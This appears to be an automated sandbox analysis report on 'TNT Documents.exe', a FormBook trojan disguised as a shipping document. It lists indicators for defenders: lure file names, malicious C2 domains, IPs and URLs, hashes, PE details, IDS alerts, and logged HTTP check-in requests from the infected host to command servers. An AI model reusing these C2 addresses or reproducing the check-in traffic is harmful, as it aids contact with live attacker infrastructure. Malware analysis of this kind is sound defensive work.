• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time | Type | Description
18:57:58 | API Interceptor | 1x Sleep call for process: TNT Documents.exe modified

Joe Sandbox View / Context

IPs

Match: 209.17.116.163
Associated Sample Name / URL | Detection | Context
RFQ - SST#2021111503.exe | malicious | www.edukado.online/teni/?1bSD0d6p=0pqFAulx9peJBQaLHhi2O539GrRUe9Dg5qnQgkcE3vGHf3Q1HjrP1jP/RDvSqSrk2xiP&jJB=9r9x5R
yVvATSvedsfMg0l.exe | malicious | www.ichelbrousset.com/czh8/?h0DX=irrd3yuyc1GImfABIedh2a+c4kF1IqLY7IOBv/DJSDLKV1P8G+/4s2D0JrIDDvMvFjLtzXE2ZQ==&UpZ=4hzll
DZqb1YCMJknskFE.exe | malicious | www.alvarezdelugo.store/9mj8/?b61TGp=UkZThqrRocv5vk1faiVRq9+iiPL+c1gbqU90ov2hL2y42KpkYKZbBF4nZ16GjYtZO51IIqH2Lg==&2dXl=-Zt00jOpTfntw
DHL Documents.exe | malicious | www.specialtyplastics.online/how6/?l2Jl=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnzra08qQhypJ&Tf5pq=W6zlk8Rp
Dhl_AWB5032675620,pdf.exe | malicious | www.durston.store/b62n/?t64PStG=z6Vsvg8A5NXyXPPhKMZIBHml/L7mqqirp/PWrU0BeLpkyNyDM5h+f+EgtIJL2Tixlbzc&Sp=4hX0vf
vbc.exe | malicious | www.applebroog.industries/fqiq/?2d=0RH9gkF6jVnFZMBLg5arrRt8ci9oBvnO845D4NtwM1wnd4qumJjOU8GaWcQJQdSDPFjg&KBZh8h=9rFxIRS8frv8A02
TT_SWIFT_Export Order_noref S10SMG00318021.exe | malicious | www.aarondecker.online/46uq/?j0=SFN8Rxuh3&3fQ0Khi=IBlQMs5j29CKqlv3/eZQ6Z47udTwmev2IX+bwOiN2E8lumQwhRgtDV6FzU7U1t+cHC/Y
Nuevo Pedido.exe | malicious | www.downingmunroe.online/udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN
Payment Advice.doc | malicious | www.nihonkoryu.site/cy88/?JpCxc=UdPBVTbj1CZF+opyLZ3z0qAaJaL/JpkwFii79QX209xtQVaMtZARr5G5+pIvOlE0oIFN3g==&9rl=-Z8xBfo8a6
68886.xlsx | malicious | www.viscoent.online/scb0/?bXi=L8pgukv0AuVDNAdjNh2AJGutMHnCfg3bCrFlNw+YyifAdhr3mrIeLuq3PR+hiDkJiRhf3g==&PB=hxoT
PO_No.202201EYL-01_ABW.exe | malicious | www.aarondecker.online/46uq/?j6Al=IBlQMs5j29CKqlv3/eZQ6Z47udTwmev2IX+bwOiN2E8lumQwhRgtDV6FzXbE6MukZnWf&4hqTJ=PpNtRPgx0VJ
rfq.exe | malicious | www.eloiseball.online/s2qi/?MhBd9XLx=CJ4ega8we8rDK2oOyDtNp6AuRxR37H0DfWv6L4ABKIpafKqiPSieQwyYu/RVEHddVBRA&SR=d0DLMt
New Order.xlsx | malicious | www.viscoent.online/scb0/?NN6=L8pgukv0AuVDNAdjNh2AJGutMHnCfg3bCrFlNw+YyifAdhr3mrIeLuq3PR+hiDkJiRhf3g==&lFND1Z=6lPhL
PO202104-114 - APQ Comercial Apoquindo,pdf.exe | malicious | www.durston.store/b62n/?ChJte=z6Vsvg8A5NXyXPPhKMZIBHml/L7mqqirp/PWrU0BeLpkyNyDM5h+f+EgtIJhpjSxhZ7c&d6A=SJExlzkP
As5zvmxhPo.exe | malicious | www.scbcommunity.partners/xgmi/?SzrxP8lx=ibySZgQScShq1lS4qM2nT1qHIBOXZbGjkidZCxDm/G3nGy75y5MD+ijFjtG1ArxxbKo6&tTbDp=7nf8x
SWIFT-MLSB-11,546.doc | malicious | www.howellenterprises.biz/cy88/?0deDKH=f2Jd-DLxZJsXUZ&cjXL1rR=fkUWIEJ3aTmqc1Hb/8mQzV6AtAV96QXeCAvCSnvV4vLU/JJ/qpHHTJ9bGgGB5MvhUhf5fg==
SHIPMENT ARRIVAL NOTICE - ORIGINAL DOCUMENTS__pdf.exe | malicious | www.gzsz.online/ubw4/?cR-H=RPx2ZUkBCpbabyLVYaiQALpYpcukYHUKRCHGI7PR5DR61tf9OEQgp5XPT5XPjlBrfWaDsOZcvg==&G4=q6PdCh7
Quote request.exe | malicious | www.eloiseball.online/s2qi/?lZwxYz=y6AldH-&TJELpfLP=CJ4ega8we8rDK2oOyDtNp6AuRxR37H0DfWv6L4ABKIpafKqiPSieQwyYu/RVEHddVBRA
scan_21000076119_pdf.exe | malicious | www.edukado.online/teni/?3fx8BFd=0pqFAulx9peJBQaLHhi2O539GrRUe9Dg5qnQgkcE3vGHf3Q1HjrP1jP/RAPo6DLcsWDI&A6U89=j2JXRdWhjhk8k
NEW ORDER 2021.exe | malicious | www.metalworkingadditives.online/b2c0/?N0=tQ9OUq/fzxn+R82X6GTzZlmpGIW84sc0d5YJpv42KDMZxUSBkatd7Ys79Ad1zpKElTcI&o48=QhiPALAplp

Domains

Match: www.specialtyplastics.online
Associated Sample Name / URL | Detection | Context
DHL Documents.exe | malicious | 209.17.116.163

ASN

Match: PUBLIC-DOMAIN-REGISTRY (US)
Associated Sample Name / URL | Detection | Context
Dhl Document.exe | malicious | 208.91.199.224
DHL Waybill receipt.exe | malicious | 208.91.199.223
Shipping Document BL Copy.exe | malicious | 103.195.185.115
DHL SHIPMENT NOTIFICATION 284748395PD.exe | malicious | 208.91.199.223
SHIPPING DOCUMENT & PL.exe | malicious | 103.195.185.115
Swift MT103 pdf.exe | malicious | 208.91.199.225
Scan096355.exe | malicious | 208.91.199.225
yYa94CeATF8h2NA.exe | malicious | 208.91.199.223
part-1500645108.xlsb | malicious | 103.76.231.42
part-1500645108.xlsb | malicious | 103.76.231.42
item-40567503.xlsb | malicious | 162.215.254.201
item-40567503.xlsb | malicious | 162.215.254.201
PG4636 - Confirmed .xls.exe | malicious | 208.91.198.143
item-107262298.xlsb | malicious | 162.215.254.201
item-107262298.xlsb | malicious | 162.215.254.201
item-1202816963.xlsb | malicious | 162.215.254.201
item-1202816963.xlsb | malicious | 162.215.254.201
DHL Receipt.html | malicious | 199.79.62.126
BOQ.exe | malicious | 208.91.199.223
RFQ-Spares and tools.exe | malicious | 208.91.198.143

Match: OVH (FR)
Associated Sample Name / URL | Detection | Context
ClaimCopy-1848214335-12022021.xlsb | malicious | 158.69.133.78
ClaimCopy-1848214335-12022021.xlsb | malicious | 158.69.133.78
ClaimCopy-539408676-12022021.xlsb | malicious | 158.69.133.78
ClaimCopy-539408676-12022021.xlsb | malicious | 158.69.133.78
ClaimCopy-539408676-12022021.xlsb | malicious | 158.69.133.78
reg.exe | malicious | 213.186.33.5
REQUEST FOR SPECIFICATION.exe | malicious | 213.251.158.218
ETgVKIYRW5.dll | malicious | 149.56.106.83
cMVyW1SDZz.dll | malicious | 149.56.106.83
ETgVKIYRW5.dll | malicious | 149.56.106.83
cMVyW1SDZz.dll | malicious | 149.56.106.83
2iJBYBel22.dll | malicious | 149.56.106.83
2iJBYBel22.dll | malicious | 149.56.106.83
Tender SN980018277 & SN9901827 Signed Copy.exe | malicious | 51.161.104.181
Invoice.exe | malicious | 54.38.220.85
AegEywmjUJ.exe | malicious | 51.79.99.124
P.O SPECIFICATION.xlsx | malicious | 51.79.99.124
DC-330NC.xlsx | malicious | 51.79.99.124
FILE_915494026923219.xlsm | malicious | 158.69.222.101
UioA2E9DBG.dll | malicious | 158.69.222.101

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TNT Documents.exe.log
Process: C:\Users\user\Desktop\TNT Documents.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1314
Entropy (8bit): 5.350128552078965
Encrypted: false
SSDEEP: 24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5: 1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1: B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256: 28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512: 95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.5483150102950916
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: TNT Documents.exe
File size: 503808
MD5: f943d9ee79559042bfff9b4e55270cfa
SHA1: 7dca5c03f55ab6cbebd6bb3a8203d5c1d7516567
SHA256: 2c26343342361efe4ada7dd077f832792eb77f184ec9a6c5b8c3a8ad35dd5aaa
SHA512: c9d6bffff768eb7ff3853eeec196e21286a7d5be040c1b1dc4882cc106fd61d6d33ce24444eb77452fef33310a8d202a7568a4cf6db9c4e9b824b6d54b91cf09
SSDEEP: 12288:dIzgxqzpbqi/RAu/jlYQpYRKz7OoDxI7pIHL0i:dew2Zqi/B/Jb+IX9I7pIr0
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.9...............P.................. ........@.. ....................... ............@................................

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x47c5be
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0xA539E86C [Sat Nov 3 17:54:52 2057 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al   (repeated 97 times: the bytes following the CLR entry stub are zero padding, and 00 00 disassembles as add byte ptr [eax], al)

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7c56c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7e000 | 0x5ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x80000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x7c550 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x7a5c4 | 0x7a600 | False | 0.809814702503 | data | 7.56105630003 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x7e000 | 0x5ac | 0x600 | False | 0.421223958333 | data | 4.10451869633 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x80000 | 0xc | 0x200 | False | 0.044921875 | data | 0.0980041756627 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x7e090 | 0x31c | data | |
RT_MANIFEST | 0x7e3bc | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

Imports

DLL | Import
mscoree.dll | _CorExeMain

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2019
Assembly Version | 1.0.0.0
InternalName | kvhWV10.exe
FileVersion | 1.0.0.0
CompanyName |
LegalTrademarks |
Comments |
ProductName | ConnectFour
ProductVersion | 1.0.0.0
FileDescription | ConnectFour
OriginalFilename | kvhWV10.exe

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  12/02/21-18:59:22.638450TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979480192.168.2.751.255.30.106
                                                                  12/02/21-18:59:22.638450TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979480192.168.2.751.255.30.106
                                                                  12/02/21-18:59:22.638450TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979480192.168.2.751.255.30.106
                                                                  12/02/21-18:59:43.047578TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.7119.18.54.99
                                                                  12/02/21-18:59:43.047578TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.7119.18.54.99
                                                                  12/02/21-18:59:43.047578TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.7119.18.54.99
                                                                  12/02/21-18:59:48.300111TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982280192.168.2.734.102.136.180
                                                                  12/02/21-18:59:48.300111TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982280192.168.2.734.102.136.180
                                                                  12/02/21-18:59:48.300111TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982280192.168.2.734.102.136.180
                                                                  12/02/21-18:59:48.478607TCP1201ATTACK-RESPONSES 403 Forbidden804982234.102.136.180192.168.2.7
                                                                  12/02/21-18:59:59.432108TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982780192.168.2.7158.69.116.156
                                                                  12/02/21-18:59:59.432108TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982780192.168.2.7158.69.116.156
                                                                  12/02/21-18:59:59.432108TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982780192.168.2.7158.69.116.156

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 2, 2021 18:59:22.612127066 CET4979480192.168.2.751.255.30.106
                                                                  Dec 2, 2021 18:59:22.638113976 CET804979451.255.30.106192.168.2.7
                                                                  Dec 2, 2021 18:59:22.638432980 CET4979480192.168.2.751.255.30.106
                                                                  Dec 2, 2021 18:59:22.638449907 CET4979480192.168.2.751.255.30.106
                                                                  Dec 2, 2021 18:59:22.664401054 CET804979451.255.30.106192.168.2.7
                                                                  Dec 2, 2021 18:59:22.687228918 CET804979451.255.30.106192.168.2.7
                                                                  Dec 2, 2021 18:59:22.687256098 CET804979451.255.30.106192.168.2.7
                                                                  Dec 2, 2021 18:59:22.687608004 CET4979480192.168.2.751.255.30.106
                                                                  Dec 2, 2021 18:59:22.687623978 CET4979480192.168.2.751.255.30.106
                                                                  Dec 2, 2021 18:59:22.715280056 CET804979451.255.30.106192.168.2.7
                                                                  Dec 2, 2021 18:59:27.825119019 CET4981580192.168.2.7209.17.116.163
                                                                  Dec 2, 2021 18:59:30.835841894 CET4981580192.168.2.7209.17.116.163
                                                                  Dec 2, 2021 18:59:36.839976072 CET4981580192.168.2.7209.17.116.163
                                                                  Dec 2, 2021 18:59:36.957561016 CET8049815209.17.116.163192.168.2.7
                                                                  Dec 2, 2021 18:59:36.957724094 CET4981580192.168.2.7209.17.116.163
                                                                  Dec 2, 2021 18:59:36.959983110 CET4981580192.168.2.7209.17.116.163
                                                                  Dec 2, 2021 18:59:37.078370094 CET8049815209.17.116.163192.168.2.7
                                                                  Dec 2, 2021 18:59:37.078394890 CET8049815209.17.116.163192.168.2.7
                                                                  Dec 2, 2021 18:59:37.078526974 CET4981580192.168.2.7209.17.116.163
                                                                  Dec 2, 2021 18:59:37.079992056 CET4981580192.168.2.7209.17.116.163
                                                                  Dec 2, 2021 18:59:37.197520971 CET8049815209.17.116.163192.168.2.7
                                                                  Dec 2, 2021 18:59:42.873569965 CET4982080192.168.2.7119.18.54.99
                                                                  Dec 2, 2021 18:59:43.044531107 CET8049820119.18.54.99192.168.2.7
                                                                  Dec 2, 2021 18:59:43.047132015 CET4982080192.168.2.7119.18.54.99
                                                                  Dec 2, 2021 18:59:43.047578096 CET4982080192.168.2.7119.18.54.99
                                                                  Dec 2, 2021 18:59:43.224122047 CET8049820119.18.54.99192.168.2.7
                                                                  Dec 2, 2021 18:59:43.231224060 CET8049820119.18.54.99192.168.2.7
                                                                  Dec 2, 2021 18:59:43.231247902 CET8049820119.18.54.99192.168.2.7
                                                                  Dec 2, 2021 18:59:43.231529951 CET4982080192.168.2.7119.18.54.99
                                                                  Dec 2, 2021 18:59:43.231673956 CET4982080192.168.2.7119.18.54.99
                                                                  Dec 2, 2021 18:59:43.407816887 CET8049820119.18.54.99192.168.2.7
                                                                  Dec 2, 2021 18:59:48.280668020 CET4982280192.168.2.734.102.136.180
                                                                  Dec 2, 2021 18:59:48.299729109 CET804982234.102.136.180192.168.2.7
                                                                  Dec 2, 2021 18:59:48.299890041 CET4982280192.168.2.734.102.136.180
                                                                  Dec 2, 2021 18:59:48.300111055 CET4982280192.168.2.734.102.136.180
                                                                  Dec 2, 2021 18:59:48.319057941 CET804982234.102.136.180192.168.2.7
                                                                  Dec 2, 2021 18:59:48.478606939 CET804982234.102.136.180192.168.2.7
                                                                  Dec 2, 2021 18:59:48.478634119 CET804982234.102.136.180192.168.2.7
                                                                  Dec 2, 2021 18:59:48.478806019 CET4982280192.168.2.734.102.136.180
                                                                  Dec 2, 2021 18:59:48.931884050 CET4982280192.168.2.734.102.136.180
                                                                  Dec 2, 2021 18:59:48.950918913 CET804982234.102.136.180192.168.2.7

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 2, 2021 18:59:22.561023951 CET | 49958 | 53 | 192.168.2.7 | 8.8.8.8
Dec 2, 2021 18:59:22.592832088 CET | 53 | 49958 | 8.8.8.8 | 192.168.2.7
Dec 2, 2021 18:59:27.700095892 CET | 50860 | 53 | 192.168.2.7 | 8.8.8.8
Dec 2, 2021 18:59:27.823506117 CET | 53 | 50860 | 8.8.8.8 | 192.168.2.7
Dec 2, 2021 18:59:42.128535032 CET | 50452 | 53 | 192.168.2.7 | 8.8.8.8
Dec 2, 2021 18:59:42.871825933 CET | 53 | 50452 | 8.8.8.8 | 192.168.2.7
Dec 2, 2021 18:59:48.248903990 CET | 59310 | 53 | 192.168.2.7 | 8.8.8.8
Dec 2, 2021 18:59:48.279051065 CET | 53 | 59310 | 8.8.8.8 | 192.168.2.7
Dec 2, 2021 18:59:53.948990107 CET | 51919 | 53 | 192.168.2.7 | 8.8.8.8
Dec 2, 2021 18:59:53.979896069 CET | 53 | 51919 | 8.8.8.8 | 192.168.2.7
Dec 2, 2021 18:59:58.996303082 CET | 64296 | 53 | 192.168.2.7 | 8.8.8.8
Dec 2, 2021 18:59:59.324498892 CET | 53 | 64296 | 8.8.8.8 | 192.168.2.7
Dec 2, 2021 19:00:09.559422970 CET | 56680 | 53 | 192.168.2.7 | 8.8.8.8
Dec 2, 2021 19:00:09.585350990 CET | 53 | 56680 | 8.8.8.8 | 192.168.2.7
Dec 2, 2021 19:00:14.876486063 CET | 58820 | 53 | 192.168.2.7 | 8.8.8.8
Dec 2, 2021 19:00:14.937154055 CET | 53 | 58820 | 8.8.8.8 | 192.168.2.7
Dec 2, 2021 19:00:19.954091072 CET | 60983 | 53 | 192.168.2.7 | 8.8.8.8
Dec 2, 2021 19:00:19.995712042 CET | 53 | 60983 | 8.8.8.8 | 192.168.2.7
Dec 2, 2021 19:00:25.002089977 CET | 52286 | 53 | 192.168.2.7 | 8.8.8.8
Dec 2, 2021 19:00:25.555591106 CET | 53 | 52286 | 8.8.8.8 | 192.168.2.7

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Dec 2, 2021 18:59:22.561023951 CET | 192.168.2.7 | 8.8.8.8 | 0xb8d4 | Standard query (0) | www.cortepuroiberico.com | A (IP address) | IN (0x0001)
Dec 2, 2021 18:59:27.700095892 CET | 192.168.2.7 | 8.8.8.8 | 0x47d2 | Standard query (0) | www.specialtyplastics.online | A (IP address) | IN (0x0001)
Dec 2, 2021 18:59:42.128535032 CET | 192.168.2.7 | 8.8.8.8 | 0xdbef | Standard query (0) | www.metronixmedical.com | A (IP address) | IN (0x0001)
Dec 2, 2021 18:59:48.248903990 CET | 192.168.2.7 | 8.8.8.8 | 0xbbe2 | Standard query (0) | www.coached.info | A (IP address) | IN (0x0001)
Dec 2, 2021 18:59:53.948990107 CET | 192.168.2.7 | 8.8.8.8 | 0x4020 | Standard query (0) | www.pentagonpublishers.com | A (IP address) | IN (0x0001)
Dec 2, 2021 18:59:58.996303082 CET | 192.168.2.7 | 8.8.8.8 | 0xe702 | Standard query (0) | www.projectcentered.com | A (IP address) | IN (0x0001)
Dec 2, 2021 19:00:09.559422970 CET | 192.168.2.7 | 8.8.8.8 | 0x47eb | Standard query (0) | www.functionalsoft.com | A (IP address) | IN (0x0001)
Dec 2, 2021 19:00:14.876486063 CET | 192.168.2.7 | 8.8.8.8 | 0xaa06 | Standard query (0) | www.viavelleiloes.online | A (IP address) | IN (0x0001)
Dec 2, 2021 19:00:19.954091072 CET | 192.168.2.7 | 8.8.8.8 | 0x8197 | Standard query (0) | www.pirosconsulting.com | A (IP address) | IN (0x0001)
Dec 2, 2021 19:00:25.002089977 CET | 192.168.2.7 | 8.8.8.8 | 0xe1bb | Standard query (0) | www.floridanratraining.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Dec 2, 2021 18:59:22.592832088 CET | 8.8.8.8 | 192.168.2.7 | 0xb8d4 | No error (0) | www.cortepuroiberico.com | cortepuroiberico.com |  | CNAME (Canonical name) | IN (0x0001)
Dec 2, 2021 18:59:22.592832088 CET | 8.8.8.8 | 192.168.2.7 | 0xb8d4 | No error (0) | cortepuroiberico.com |  | 51.255.30.106 | A (IP address) | IN (0x0001)
Dec 2, 2021 18:59:27.823506117 CET | 8.8.8.8 | 192.168.2.7 | 0x47d2 | No error (0) | www.specialtyplastics.online |  | 209.17.116.163 | A (IP address) | IN (0x0001)
Dec 2, 2021 18:59:42.871825933 CET | 8.8.8.8 | 192.168.2.7 | 0xdbef | No error (0) | www.metronixmedical.com | metronixmedical.com |  | CNAME (Canonical name) | IN (0x0001)
Dec 2, 2021 18:59:42.871825933 CET | 8.8.8.8 | 192.168.2.7 | 0xdbef | No error (0) | metronixmedical.com |  | 119.18.54.99 | A (IP address) | IN (0x0001)
Dec 2, 2021 18:59:48.279051065 CET | 8.8.8.8 | 192.168.2.7 | 0xbbe2 | No error (0) | www.coached.info | coached.info |  | CNAME (Canonical name) | IN (0x0001)
Dec 2, 2021 18:59:48.279051065 CET | 8.8.8.8 | 192.168.2.7 | 0xbbe2 | No error (0) | coached.info |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Dec 2, 2021 18:59:53.979896069 CET | 8.8.8.8 | 192.168.2.7 | 0x4020 | Name error (3) | www.pentagonpublishers.com | none | none | A (IP address) | IN (0x0001)
Dec 2, 2021 18:59:59.324498892 CET | 8.8.8.8 | 192.168.2.7 | 0xe702 | No error (0) | www.projectcentered.com | projectcentered.com |  | CNAME (Canonical name) | IN (0x0001)
Dec 2, 2021 18:59:59.324498892 CET | 8.8.8.8 | 192.168.2.7 | 0xe702 | No error (0) | projectcentered.com |  | 158.69.116.156 | A (IP address) | IN (0x0001)
Dec 2, 2021 19:00:09.585350990 CET | 8.8.8.8 | 192.168.2.7 | 0x47eb | No error (0) | www.functionalsoft.com |  | 74.208.236.210 | A (IP address) | IN (0x0001)
Dec 2, 2021 19:00:14.937154055 CET | 8.8.8.8 | 192.168.2.7 | 0xaa06 | Server failure (2) | www.viavelleiloes.online | none | none | A (IP address) | IN (0x0001)
Dec 2, 2021 19:00:19.995712042 CET | 8.8.8.8 | 192.168.2.7 | 0x8197 | Name error (3) | www.pirosconsulting.com | none | none | A (IP address) | IN (0x0001)
Dec 2, 2021 19:00:25.555591106 CET | 8.8.8.8 | 192.168.2.7 | 0xe1bb | Server failure (2) | www.floridanratraining.com | none | none | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.cortepuroiberico.com
• www.specialtyplastics.online
• www.metronixmedical.com
• www.coached.info

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49794 | 51.255.30.106 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Dec 2, 2021 18:59:22.638449907 CET | 14538 | OUT | GET /how6/?iN9tFB=6MRiWtHRwAFwDvhVcJAGZD0p4fLcIEcyVDy1Zth0WcmsI64tqWfeZe6Y2j9BcQs7bzR6A9198A==&4h=7n_DRJGxnRd HTTP/1.1
Host: www.cortepuroiberico.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Dec 2, 2021 18:59:22.687228918 CET | 14538 | IN | HTTP/1.1 502 Bad Gateway
Server: nginx
Date: Thu, 02 Dec 2021 17:59:22 GMT
Content-Type: text/html
Content-Length: 150
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.7 | 49815 | 209.17.116.163 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Dec 2, 2021 18:59:36.959983110 CET | 14601 | OUT | GET /how6/?iN9tFB=xCGPRvAkK+xY+IPwAFenqNjQ2EZcc1A/OJpQ1mtXoxRJ135kHr2e9wYqnwHz38WooRcfQb4d5g==&4h=7n_DRJGxnRd HTTP/1.1
Host: www.specialtyplastics.online
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Dec 2, 2021 18:59:37.078370094 CET | 14601 | IN | HTTP/1.1 400 Bad Request
